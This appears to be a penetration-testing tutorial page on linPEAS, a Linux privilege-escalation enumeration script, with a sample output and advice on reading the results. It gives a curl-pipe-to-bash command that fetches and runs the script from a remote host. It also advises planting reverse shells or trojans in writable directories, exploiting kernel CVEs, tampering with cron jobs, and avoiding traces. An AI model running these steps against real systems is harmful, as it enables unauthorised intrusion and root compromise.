linPEAS


            
        

        


        
        
        
    
















linPEAS (Linux Privilege Escalation Awesome Script) is an advanced tool for post-exploitation on Linux systems, designed to automate the process of identifying potential privilege escalation opportunities. It searches the target system for known vulnerabilities, misconfigurations, and common attack vectors that could be exploited to gain root access.





It is typically used by penetration testers and ethical hackers during the post-exploitation phase to increase access levels on compromised Linux systems. linPEAS is fast, thorough, and covers a wide range of checks, from system information and environment variables to kernel vulnerabilities and writable directories.










Quick Command Snippet





Once you’ve gained access to a Linux system, run linPEAS using the following command to check for privilege escalation vectors:





> curl -s https://yourdomain.com/tools/linpeas.sh | bash





    

  • This will download the linPEAS script and run it in the same command, scanning the system for privilege escalation opportunities.
    • 




  • The tool is simple to use and can be executed as a regular user (non-root), though it may provide more relevant results when run as root.
    • 











Overview of linPEAS Usage





How to Use linPEAS





To run linPEAS on a target system, you can either download it manually or execute it directly from the web using the command snippet provided above. Below are the steps to execute linPEAS:





    

  1. Execute linPEAS: Run the following command directly from your shell:
    > curl -s https://yourdomain.com/tools/linpeas.sh | bash
    2. 




  2. Output: linPEAS will produce a detailed output, categorized by areas that may contain privilege escalation vectors. It checks for a wide variety of weaknesses, including misconfigured SUID binaries, world-writable directories, known kernel vulnerabilities, and more.
    3. 




  3. Analyzing Results: The results will be categorized into sections such as “SUID binaries,” “Writable directories,” and “Kernel vulnerabilities.” These are the areas you need to focus on for further exploitation or post-exploitation activities.
    4. 






Important Notes:





    

  • It’s best to run linPEAS with the least privileges possible to avoid leaving traces. For example, run it as a regular user if possible.
    • 




  • It’s a good practice to execute linPEAS on different Linux distributions and versions as some issues may be specific to certain system configurations.
    • 











Example Output





After running linPEAS, you might see output like this:





[*] SUID binaries found:
    /usr/bin/sudo
    /usr/bin/pkexec
    /usr/bin/passwd
    ...

[*] Writable directories found:
    /var/www/html
    /home/user/.ssh/
    /etc/cron.d/

[*] Kernel vulnerabilities:
    CVE-2021-XXXX
    CVE-2020-YYYY
    ...

[*] Scheduled tasks:
    /etc/cron.d/root
    /etc/crontab

[*] Kernel Information:
    Kernel version: 5.4.0-42-generic
    Architecture: x86_64
    ...





Explanation of Output:





    

  • SUID Binaries: These binaries allow a user to execute them with the permissions of the binary’s owner, often root. This is a common privilege escalation vector.
    • 




  • Writable Directories: These directories may be used to upload malicious scripts or binaries that could allow you to escalate privileges.
    • 




  • Kernel Vulnerabilities: If the system is running a vulnerable kernel, you may be able to exploit this weakness to gain root access.
    • 




  • Scheduled Tasks: These may allow for privilege escalation if they are misconfigured or have weak permissions.
    • 











How to Interpret the Results





Key Sections to Focus On:





    

  1. SUID Binaries

      

    • What It Means: SUID (Set User ID) binaries run with the permissions of the binary’s owner (often root), which can be exploited for privilege escalation.
      • 




    • Next Steps: Check for misconfigured binaries. For example, try running /usr/bin/sudo or /usr/bin/passwd in a way that could elevate your privileges.
      • 

    

    2. 




  2. Writable Directories

      

    • What It Means: Directories with write permissions might allow an attacker to upload malicious files or scripts.
      • 




    • Next Steps: Upload a reverse shell, malicious script, or trojan into these writable directories and execute it to escalate privileges.
      • 

    

    3. 




  3. Kernel Vulnerabilities

      

    • What It Means: The presence of known kernel vulnerabilities (listed by CVE numbers) opens the door for kernel-level exploits.
      • 




    • Next Steps: Search for available exploits for these CVEs and attempt to exploit them to escalate your privileges.
      • 

    

    4. 




  4. Scheduled Tasks

      

    • What It Means: Misconfigured cron jobs or scheduled tasks with weak permissions might allow for privilege escalation.
      • 




    • Next Steps: Investigate and modify scheduled tasks that you can control to gain root access.
      • 

    

    5. 











Download linPEAS





To make it easier for your penetration testing tasks, you can download linPEAS directly from the following links:









Note: Always ensure you’re downloading linPEAS from a trusted source to avoid malicious versions of the script.










Conclusion





linPEAS is an essential tool for any post-exploitation engagement in Linux environments. It automates the process of scanning for common privilege escalation vectors and provides a comprehensive report of potential weaknesses on the target system.





Next Steps:





Always remember to conduct these activities responsibly and legally, ensuring you have authorization to test the target systems.





After executing linPEAS and reviewing the output, look for areas where privilege escalation is possible.





Leverage the discovered vulnerabilities (e.g., SUID binaries, writable directories, kernel exploits) to escalate your privileges and gain root access.